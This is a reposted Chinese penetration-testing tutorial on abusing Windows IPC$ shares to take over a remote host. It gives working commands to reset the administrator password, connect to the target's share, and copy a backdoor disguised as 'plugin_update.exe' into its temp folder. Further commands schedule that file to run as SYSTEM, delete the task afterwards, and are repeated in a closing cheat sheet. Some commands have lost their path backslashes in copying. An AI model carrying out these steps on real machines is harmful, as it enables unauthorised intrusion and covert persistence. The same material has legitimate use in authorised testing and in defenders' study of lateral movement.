作者:素时听风
IPC$渗透使用
简介
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
使用条件
1.开放了139、445端口;
2.目标开启ipc$文件共享;
3.获取用户账号密码。
测试过程
此测试前提是获取了ipc$,
这里测试的时候得到的权限是system,然后创建了一个admin账户,给了administrators权限,但无法复制文件过去,于是就改了administrator账户密码(实战中不建议更改,可读取管理密码后再用读到的密码)。
更改密码:net user administrator "1qaz@WSX"
-
1.连接目标ipc$,将后门复制到目标机器上
net use \193.168.1.12ipc$ /user:administrator "1qaz@WSX"copy plugin_update.exe \193.168.1.12c$windowstempplugin_update.exe
-
2.创建自动任务,执行上传的后门程序
# 查看目标机器时间net time \193.168.1.12# 创建该时间之后的某个时刻自动执行任务,任务名 plugin_updateschtasks /create /tn "plugin_update" /tr c:windowstempplugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"# 如果不想等,可以立即运行后门程序schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"# 删除创建的任务schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
接收端的目标机器已上线。
常用命令
# 1.连接net use \193.168.1.12ipc$ /user:administrator "1qaz@WSX"# 2.查看连接情况net use# 3.查看目标主机共享资源net view \193.168.1.12# 4.查看目标主机时间net time \193.168.1.12# 5.查看目标主机的NetBIOS用户(自己本机也需开启)nbtstat -A 193.168.1.12# 6.删除连接net use \193.168.1.12ipc$ /del# 7.文件上传下载copy plugin_update.exe \193.168.1.12c$windowstempplugin_update.exe(上传到目标的:cwindowstemp目录下)copy \127.0.0.1c$test.exe c:(下载到本地c盘下)# 8.创建计划任务schtasks /create /tn "plugin_update" /tr c:windowstempplugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"# 9.立即执行计划任务schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"# 10.删除计划任务schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX
作者:素时听风出处:https://www.cnblogs.com/sstfy/p/10414680.html版权:本文采用「署名-非商业性使用-相同方式共享 4.0 国际」知识共享许可协议进行许可。部分文章为本人工作、学习中所查阅资料时觉得受益很大,并转载分享。并注明了作者与原文链接。
如果觉得文章对你有帮助,请支持下点击右下角“在看”
本文始发于微信公众号(LemonSec):IPC$渗透使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论